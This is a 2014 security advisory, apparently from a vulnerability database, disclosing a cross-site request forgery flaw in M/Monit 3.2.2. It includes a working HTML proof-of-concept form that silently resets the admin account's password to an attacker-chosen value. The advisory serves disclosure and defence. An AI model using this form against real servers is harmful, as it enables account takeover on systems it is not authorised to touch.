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M/Monit 3.2.2 Cross Site Request Forgery Vulnerability

🗓️ 20 Sep 2014 00:00:00Reported by Dolev FarhiType 
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M/Monit 3.2.2 CSRF Vulnerability allows account hijack without passwor

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Application: M/Monit 3.2.2
Author: Dolev Farhi @dolevff
Date: 13.9.2014
Relevant CVEs: CVE-2014-6409, CVE-2014-6607
Vulnerable version: <= 3.2.2



M/Monit is an Easy, proactive monitoring of Unix systems, network and 
cloud services.

1. Vulnerability Description:
Account hijack via cross-site request forgery (CVE-2014-6409, 
CVE-2014-6607)
It was found that M/Monit latest version is vulnerable to CSRF attacks. 
it is possible to reset the password of any user account (admin/user)
on the system without needing to know the current password of the 
attacked account, due to missing password change verification mechanism.
2. Proof of concept
<html> <div align="center"> <pre> <h2> CSRF poc M/monit </h2> <body> 
<form action="http://mmonit_server:8080/admin/users/update" 
method="POST"> <input type="hidden" name="fullname" 
value="Administrator" /> <input type="hidden" name="password" 
value="attacker_pass" /> <input type="hidden" name="email" 
value="[email protected]" /> <input type="hidden" name="admin" 
value="on" /> <input type="hidden" name="uname" value="admin" /> <input 
type="submit" name="submit" value="submit" />   </form>   </body> </div> 
</html>

3. Mitigation
Software vendor confirmed the issue, and a fix might be released in the 
future.
4. Time line:
15.9 - Found vulnerabilities
15.9 - Notified software vendor
15.9 - CVE Requested
17.9 - CVEs Assigned
18.9 - Vendor confirmed security issues,
           release will be released in the future
19.9 - public disclosure

- Discovered by Dolev Farhi, F5 Networks

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